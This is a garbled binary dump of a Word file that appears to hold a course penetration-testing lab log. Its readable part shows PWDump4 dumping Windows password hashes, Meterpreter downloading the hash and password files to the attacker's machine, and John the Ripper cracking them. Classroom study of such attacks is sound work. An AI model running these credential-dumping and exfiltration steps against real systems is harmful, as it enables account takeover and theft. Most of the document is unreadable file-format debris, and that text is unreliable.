[/o:outputFile] [/u:userName] [Target] -- Target Computer's ip or name to work, [/l] -- works on local Computer. [/s:share] -- Share used to copy files instead of Admin$. [/o:outputFile] -- Result filename for output. [/u:userName] -- UserName used to connect, provide password later. [/r[:newname]] -- Rename the files to 'newname' when copy to the target, rename service name also, see FAQ for more. C:\>PWDump4 /l /o:pw.txt PWDump4 /l /o:pw.txt PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack. by bingle@email.com.cn This program is free software based on pwpump3 by Phil Staubs under the GNU General Public License Version 2. SRV>Version: OS Ver 5.1, , Workstation C:\>dir dir Volume in drive C has no label. Volume Serial Number is ECC2-88FC Directory of C:\ 07/27/2004 09:21 PM 0 AUTOEXEC.BAT 07/27/2004 09:21 PM 0 CONFIG.SYS 07/27/2004 09:54 PM cs301 01/07/2007 12:23 AM Documents and Settings 03/05/2007 11:34 PM 88 passwd.txt 03/05/2007 10:59 PM 229,376 plink.exe 01/07/2007 12:20 AM Program Files 03/05/2007 11:42 PM 169 pw.txt 03/05/2007 11:20 PM 4,608 PWDump4.dll 03/05/2007 11:19 PM 16,384 PWDump4.exe 03/05/2007 10:58 PM 308,736 wget.exe 03/05/2007 11:09 PM WINDOWS 8 File(s) 559,361 bytes 4 Dir(s) 15,456,821,248 bytes free C:\> C:\>exit exit interact: Ending interactive session. meterpreter> download c:\pw.txt /pentest download: Starting download from 'c:\pw.txt' to '/pentest/pw.txt'... download: 1 downloads started. meterpreter> download: Download to '/pentest/pw.txt' succeeded. meterpreter> download c:\passwd.txt /pentest download: Starting download from 'c:\passwd.txt' to '/pentest/passwd.txt'... download: 1 downloads started. meterpreter> download: Download to '/pentest/passwd.txt' succeeded. meterpreter> quit [cs591@viva pentest]$ password/john-1.7.2/run/john pw.txt password/john-1.7.2/run/john: error while loading shared libraries: libcrypto.so.0: cannot open shared object file: No such file or directory [cs591@viva pentest]$ john pw.txt Loaded 2 passwords with no different salts (NT LM DES [24/32 4K]) !-2>?@ v``kѐ8YhVBhdhdmH sH hdhukhukmH sH hAhA5B*phhA5B*ph *hAhA5B*ph hAhAhAhvcJhukhq?@|k l B C D S b q   gdAgduk 7 \ ] * q 9 &y`7e QgdA5{ Z8}8&soB6gdukgdA')j?K-- { !l!!!I""">#gduk>###$Z$$$:%%%&n&&'M'''(v(())))*g***8+}++gduk+,N,,,5-y---E...'/g///H000 1K1112Y22233m33gduk34O444-5{556\6667d777A8889z9{9999 :%:M:Z::gduk::::;;*;O;P;;;;A<|<<=M==='>f>>>-?u??@D@@@gduk@@A#AJAVAxAAABcBBBC>C{CCCC$DBDYDDDDE~u~v~~~~gdd~ HU+kҀހ9Pށ3HVsgdd >pك5mn!= 01[|gddJއ߇ +bψ*q 5hڊ=Ygҋgddҋ<=eƌnjΌь ,-59Z}~ō$bgddbȎ.a!"9LАѐِݐ!"45iȑgdd7lҒ1_ Iyz!"glmgddEuv˗6hӘ6kљ0^gdd !0l "#lĜ;rbgdd`z>abtu۠Fxޡ ?rgddѢ2389BGHnܣ <iդ,-gYgdVBgdd21h:pT/ =!"#$% b 2 0@P`p2( 0@P`p 0@P`p 0@P`p 0@P`p 0@P`p 0@P`p8XV~PJ_HmH nHsH tHD`D TNormalCJ_HaJmH nHsH tHDA D Default Paragraph FontRiR 0 Table Normal4 l4a (k ( 0No List PK![Content_Types].xmlj0Eжr(΢Iw},-j4 wP-t#bΙ{UTU^hd}㨫)*1P' ^W0)T9<l#$yi};~@(Hu* Dנz/0ǰ $ X3aZ,D0j~3߶b~i>3\`?/[G\!-Rk.sԻ..a濭?PK!֧6 _rels/.relsj0 }Q%v/C/}(h"O = C?hv=Ʌ%[xp{۵_Pѣ<1H0ORBdJE4b$q_6LR7`0̞O,En7Lib/SeеPK!kytheme/theme/themeManager.xml M @}w7c(EbˮCAǠҟ7՛K Y, e.|,H,lxɴIsQ}#Ր ֵ+!,^$j=GW)E+& 8PK!Ptheme/theme/theme1.xmlYOo6w toc'vuر-MniP@I}úama[إ4:lЯGRX^6؊>$ !)O^rC$y@/yH*񄴽)޵߻UDb`}"qۋJחX^)I`nEp)liV[]1M<OP6r=zgbIguSebORD۫qu gZo~ٺlAplxpT0+[}`jzAV2Fi@qv֬5\|ʜ̭NleXdsjcs7f W+Ն7`g ȘJj|h(KD- dXiJ؇(x$( :;˹! I_TS 1?E??ZBΪmU/?~xY'y5g&΋/ɋ>GMGeD3Vq%'#q$8K)fw9:ĵ x}rxwr:\TZaG*y8IjbRc|XŻǿI u3KGnD1NIBs RuK>V.EL+M2#'fi ~V vl{u8zH *:(W☕ ~JTe\O*tHGHY}KNP*ݾ˦TѼ9/#A7qZ$*c?qUnwN%Oi4 =3ڗP 1Pm \\9Mؓ2aD];Yt\[x]}Wr|]g- eW )6-rCSj id DЇAΜIqbJ#x꺃 6k#ASh&ʌt(Q%p%m&]caSl=X\P1Mh9MVdDAaVB[݈fJíP|8 քAV^f Hn- "d>znNJ ة>b&2vKyϼD:,AGm\nziÙ.uχYC6OMf3or$5NHT[XF64T,ќM0E)`#5XY`פ;%1U٥m;R>QD DcpU'&LE/pm%]8firS4d 7y\`JnίI R3U~7+׸#m qBiDi*L69mY&iHE=(K&N!V.KeLDĕ{D vEꦚdeNƟe(MN9ߜR6&3(a/DUz<{ˊYȳV)9Z[4^n5!J?Q3eBoCM m<.vpIYfZY_p[=al-Y}Nc͙ŋ4vfavl'SA8|*u{-ߟ0%M07%<ҍPK! ѐ'theme/theme/_rels/themeManager.xml.relsM 0wooӺ&݈Э5 6?$Q ,.aic21h:qm@RN;d`o7gK(M&$R(.1r'JЊT8V"AȻHu}|$b{P8g/]QAsم(#L[PK-![Content_Types].xmlPK-!֧6 +_rels/.relsPK-!kytheme/theme/themeManager.xmlPK-!Ptheme/theme/theme1.xmlPK-! ѐ' theme/theme/_rels/themeManager.xml.relsPK] Y YT >#+3:@|E\IMRV[*^bdimrvz~ҋbYUVWXYZ[\]^_`abcdefghijklmnopqrstu8@0(  B S  ?3>LVnr*,3;U_ ,6ags Z` (8GN{)5<bv9I  / ? I g - 7 y  7 J }  * 4 ; C {    :OYa(8GQu8M\q&-DRcj$8Om)<Zklt AR (-M^qx/ENST_NX}7>nKajs %<Y[bcj28@ATp  1 > F +!A!J!S!T!f!!!!!!!"+"5"<"i"}""""":#S#Y#c#######$$$$$%7%D%f&l&&'H'R'i'|''''''' ((J(^(i(q((((((( )!)8)@)M)])))))))*#*9*B*C*O*[*l****** +5+B+d+l+o+~+++++++Q,k,p,z,,,,,......../(/4/:/f/u//0000'000000000141=1E1{1~1111111%2(2Z2]2222233*454555666W6_666^7i788#9&9V9Y999c:f:::>;A;;;;;====Q=\===========b?k???J@U@f@m@@@@@@@@@WB`BBBPCWC)D+DTD_DkDrDDDDDDDDD\FeFFFUG\G.H0HHHHH%I'I\IbIIIII JJJJJJJJJJJ KxKKKK&L1LILTLlLpLMM\NcNNNOOAPCPgPmPPPPPQQIQTQQQQQmRxRRRS S#S.S;S>SVSYS^SiSSS TTTTTTTTTTWWWWvX}XXXwZZZZZZZZ[[`[k[\\\\)\+\-\0\________`)`````````a*a6aD38Ô^`08kr',nyɛЛ!(<Gah՜%9@[->U_,6s ;N(8{)bv9I / g S j  7 J }  \ p : N  :O(8u8qDR8O)<+Al~ AR M^/E/B}-nKa@L2\wQb2pO` 1 x +!A!!!!!"+"i"}""":#S#####$$P$d$$$$%7%D%{%%%%%&G&]&&&&&)'>'i'|''''(J(^((((( )!)M)])))))*#*[*l**** +5+B+o+~+++Q,k,,,,,/-=-}----!.1.^.n...../(/f/u////0C0W00000141{1~1111111%2(2Z2]22222R3_3333334C4Q4~444455O5Y55555)6;6h66666 7/7H7w777788F8^88888#9&9V9Y9999:c:f:::>;A;;;;;(<A<<=Q=\=_=b=|=============>A>o>t>>>>> ??F?J?b?k???$@'@J@U@f@m@@@@@@@2A6AdAiAAAAABB;B?BWB`BBBCCCCCC)D+DTD_DkDrDDDDDDD7E;EiEnEEEEEF F@FDF\FeFFFG!GGGGG.H0HHHHH%I'ISIYIIIII JJJJ0J6JkJqJJJJJJJJJJ K K&K]KcKxKKKKKKL L&L1L4L;LILTLLLLLMM@MHM~MMMMMM\NcNNN!O(O^ObOOOAPCPgPmPPPPP QQIQTQQQQQQQQQIRPRmRxR{RRRRRRS SSS#S.SBSIS^SiSlSsSSSSSSS TTT!TTTTTTTTTTTTTUU;U>UUUUUVV0V;VnVyVVVVVWWqWWWWWWXXHXMXvX}XDYJYYYwZZZZZZZZZZ[[-[5[`[k[n[v[[\\\\\\ \)\+\-\/\g\o\\\\\&]1]X]c]]]]]]])^4^Y^d^^^__G_M_________*`L`y`}`~``````````aaa*aTaZaaaaaaaaa bbBbHbbbbbbbbbccDcJcccccccccc dodsdddddde=eAexe|eeef"fVfYfffg!gfghghh&h,h]h_hhhhhii=iCi|i~iiiiiiiij+j1jjjlj}jjjjjjjk-k3klknkkkkkkkkkl l!l,l/l:lNlUljlulxllllllllmmHmMmzmmmmmmn#n;nDnnnnooooo ppppppqq2q8qpqxqqqqqqqqr rrZrrrsrvrrrrsssDs]sysssssst t!t$totytttEvGvvvyvvvvvvv w#wUwXwwwww+x.xxxxxy8yyyHzSzVzYzszvzzzzzzz{{F{K{x{}{{{{{|!|9|B|||||!},}=}D}}}}}}}}}} ~ ~~~)~~~~~~~SW18lo37|~<Bsu߂)=DYdgnŃ҃ڃń΄Є҄Ԅ 58˅օ*5hsΆن 4?gr9?MSÈو܈;FozΉى =Hr}؊uIN )/ny~EJ<Gnyِ <Gq|בt!$14lt.2oqĔɔ'hj"&ce{LW~EPx&35BFHPnyܛ <Giq՜% [3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333Jk11aacc7+[;3,lcgmzN1wIt&RgMl3YlF~s" e$ 02 Jx i& % Q ~X g ,y /<^-EH:=-=cJ#KZb&%5~>IJukrPR@Xn[S:--P.11&:X vv5RC}-N6p: *&g S@ OT b o!#!P!R!{W!`!T"8"8"YS"ea"ql"E#g#z#LB$B%1%A% C%rM%N%N%Y,$|,*-C..a.(.S./mw// 000E0^01B 1(171\1h142Z2l2D3z3J84 <4r4;,5 85=5U5 '6*6462=6=6X6i7379D9J90L9uh9|9G:%g:q:~:N;<"<=.=z/>,B>J>??A%A%7A|A1 BBB UB.C~CHD[D`D`DUlDpD$1E=F_jFStFxQH{@IAxIvcJ_uJgVKhKbLLn?LVIMpoMpMNFNFNLNMhNOOeOOPOmXO \O!^OtgO}OdPPP-PdP=hPiP.-Q5QBQFQ/RLKRVRR\nRS>GSYPSRS\SmTAT;nT1U6U6U$VIVmKVJgV]W5XMXA~X:Y\CYIYDQYzYZ6ZHZ9 [[\*\z\;]t]G^G^nL^R_^:`]n`'a(c%fd eaQeomeX;fcfYg}ygp'hi2jL3jK|j\ k+ck*lllm'm.mq `{Ntgx{OSxzJ}5"vjw1~\j"c]4w< Ss. 'GKJOghvjjVZm|nMT`e@ANVhvP3no[LR O"UgenpBrPJ ;t&.=Z.@O&uC0O#uV a'0z}~;=n2BIU_-!x?x'sg9"2U`1G]YXjo7/<Z2r&&f}^'z-OdYo~S\z2a+\_c3A-tetl6M(+S-[4%j).D5_xW:t/Zx G6JGgh 'i$k!;ISsZ*d0dw&|3-Aknu P"7Xni^{hnB6NRq?~>K "TgASuc8\j(kD;Gq/L7) 'R[;{j (%zG Z4<GGM >&A4ALajDw{CNV]ih,)h+3;1BT#o^/4P]VB2fgb1]fxTM0QsE#Xe vQRl\f<$568Fu(}q%jo[vI ",b;I`b2]Y[@YX@UnknownG* Times New Roman5Symbol3. * Arial;SimSun[SOA BCambria Math"qhHfuLf`PP!20 2HP?uk2!xx Edward Chow Edward ChowOh+'0t  0 < HT\dl Edward Chow Normal.dotm Edward Chow5Microsoft Office Word@@:i @bH@֢,՜.+,0 hp|  P   Title  !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvxyz{|}~Root Entry F5Data w1Table\WordDocument4SummaryInformation(DocumentSummaryInformation8CompObjy  F'Microsoft Office Word 97-2003 Document MSWordDocWord.Document.89q